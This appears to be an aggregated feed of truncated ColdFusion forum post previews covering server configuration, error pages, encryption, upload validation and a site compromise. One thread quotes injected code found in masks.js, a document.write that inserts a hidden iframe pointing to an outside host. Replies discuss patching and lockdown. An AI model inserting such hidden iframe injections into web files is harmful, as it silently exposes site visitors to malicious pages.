Clik here to view.
Re: CF Builder
Are you looking to test your code? If yes, then you can enable the internal port of ColdFusion (server.xml: C:\ColdFusion10\cfusion\runtime\conf) and place the .cfm in the wwwroot of ColdFusion...
View ArticleCF10 VFS Max Size Limit?
It there a maximum amount of Ram that can be allocated the the virtual file system? When I specify more than 1 GB size, the system returns a negative number for the remaining free space, and any...
View ArticleCF 10 errors show Error 500 instead of normal error message
Hi, Strangely, our CF 10 server has started to show "500 - Internal server error" whenever a CF error occurs, instead of the normal error message. The error is logged, but the front end shows the error...
View ArticleMySQL aes_encrypt
hi, i am using the mysql aes_encrypt function for encrypting data in the database. i.e. a sample update query that i have: <cfquery name="updateUser" datasource="#application.datasource#">UPDATE...
View ArticleClient Variable Showing Outdated Value Intermittently
We have a legacy ColdFusion application using 150 client variables to manage session state. The client variables are centrally stored in a SQL Server database within a 6 (CF9) application server...
View ArticleRe: CF 10 errors show Error 500 instead of normal error message
Hello tribule, Thank you for your post. The error 500 is a generic error thrown by IIS. IIS received the request; however, an internal error occurred during the processing of the request. The root...
View ArticleCFIDE/scripts/masks.js Compromised
We just found an injection at the end of masks.js Here is the content that was added:"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");" Not sure what...
View ArticleRe: pause, resume, and delete not working
So, it turns out if you use 'mode' or 'group' attributes, you must have them to pause, resume, and delete the task, even if you are referencing them by thier name. Once I added 'mode' and 'group' it...
View ArticleRe: CFIDE/scripts/masks.js Compromised
Hello XeeMe2, Thank you for your post. have you followed the LockDown guide for blocking CFIDE requests. Here is the link http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products...
View ArticleRe: CFIDE/scripts/masks.js Compromised
There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual...
View ArticleRe: CFIDE/scripts/masks.js Compromised
Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping as the CFIDE will need to be accessible virtually somehow. Also it looked like a huge act for just a little improvement....
View Articleupload from local or url, the most secure file extension check
In short, I want to allowusers to uploadimagesfrom a localcomputerorurl. So, what's the best aproach to secure my application, more specifically to block all file extensions except those in white list....
View ArticleRe: CFIDE/scripts/masks.js Compromised
Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?
View ArticleRe: CFIDE/scripts/masks.js Compromised
Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products /coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf)....
View ArticleRe: upload from local or url, the most secure file extension check
Besides checking the file extension, you could add another layer of security by using IsImageFile(). It supports: JPEGGIFTIFFPNGBMP...
View ArticleRe: CFIDE/scripts/masks.js Compromised
Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks. Or, is this not a good idea? If not, why?
View ArticleGetting browser / version from cgi.http_user_agent
Hi,I am succesfully storing away into the database each individuals cgi.http_user_agent. What a want to do is chop out the browser/platform and version number from the string and display it in a...
View ArticleColdfusion 9 jnbridge\uninstaller.jar - backdoor.msil.p found
I ran malwarebytes last night, and found my Coldfusion 9 shows jnbridge\uninstall\uninstaller.jar and uninstall\uninstaller.jar infected with backdoor.MSIL.p Does anyone know Is this a false positive...
View ArticleRe: Coldfusion 9 jnbridge\uninstaller.jar - backdoor.msil.p found
seems to be a false positive.. just found this threadhttp://forums.adobe.com/thread/1266507
View ArticleInvaild CFML construct
This code excutes on Coldfusion 10... However, Why does it not excute on Coldfusion 8. The line in red is where it fails. <cfscript>if (IsDefined("FORM.fName") AND IsDefined("FORM.lName") AND...
View Article